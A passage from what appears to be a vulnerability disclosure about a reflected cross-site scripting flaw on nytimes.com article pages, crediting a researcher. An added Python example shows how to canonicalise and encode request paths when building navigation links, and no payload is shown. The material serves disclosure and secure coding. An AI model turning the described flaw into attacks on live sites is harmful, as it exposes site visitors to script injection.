client-side script into Web pages viewed by other users. A cross-site
scripting vulnerability may be used by attackers to bypass access controls
such as the same origin policy.





Reported By:
Wang Jing, mathematics student from Nanyang Technological University,
Singapore.
http://tetraph.com/wangjing/




More Details:
http://www.tetraph.com/blog/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/

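The analyses in this post and in the Mozilla lxr/mxr post earlier in the thread show the same root cause: the request path is copied raw into href attributes and link text. The following is an added example, not nytimes.com or mozilla.org code, of building such navigation links safely: the path is first canonicalised to the expected article shape (anything after the .html file name is dropped instead of reflected), then URL-encoded where it goes into an href and HTML-escaped where it goes into text, so quote and angle-bracket characters cannot terminate the attribute or the tag. The path pattern and all inputs are constructed.

```python
"""Safe construction of per-article navigation links from the request path.

Added example; ARTICLE_PATH_RE and the sample inputs are constructed.
"""
import html
import re
from urllib.parse import quote

# Constructed shape of an article path: /YYYY/MM/DD/section/slug.html
ARTICLE_PATH_RE = re.compile(r"^(/\d{4}/\d{2}/\d{2}/[\w-]+/[\w.-]+\.html)")


def canonical_article_path(request_path: str):
    """Return the recognised article path, or None if the path has another shape."""
    m = ARTICLE_PATH_RE.match(request_path)
    return m.group(1) if m else None


def nav_link(path: str, label, pagewanted) -> str:
    """One <a> element, encoded separately for the URL context and the HTML context."""
    # URL context: percent-encode everything in the path except "/", then the query value.
    href = quote(path, safe="/") + "?pagewanted=" + quote(str(pagewanted), safe="")
    # HTML context: escape for the attribute value and for the text node.
    return '<a href="%s">%s</a>' % (html.escape(href, quote=True),
                                     html.escape(str(label), quote=True))


def pagination_html(request_path: str, pages: int) -> str:
    """Print / Single Page / page-number links, or nothing for an unexpected path."""
    path = canonical_article_path(request_path)
    if path is None:
        return ""                                # unknown shape: render no navigation
    items = [nav_link(path, "Print", "print"), nav_link(path, "Single Page", "all")]
    items += [nav_link(path, n, n) for n in range(2, pages + 1)]
    return "<ul>" + "".join("<li>%s</li>" % item for item in items) + "</ul>"


if __name__ == "__main__":
    print(pagination_html("/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/trailing", 3))
```

Canonicalisation is what the post says the site moved to after 2013 (decoding and checking the URL server-side); the two encoders are the part that must be present regardless, because a source browser like lxr cannot restrict file paths to a fixed pattern.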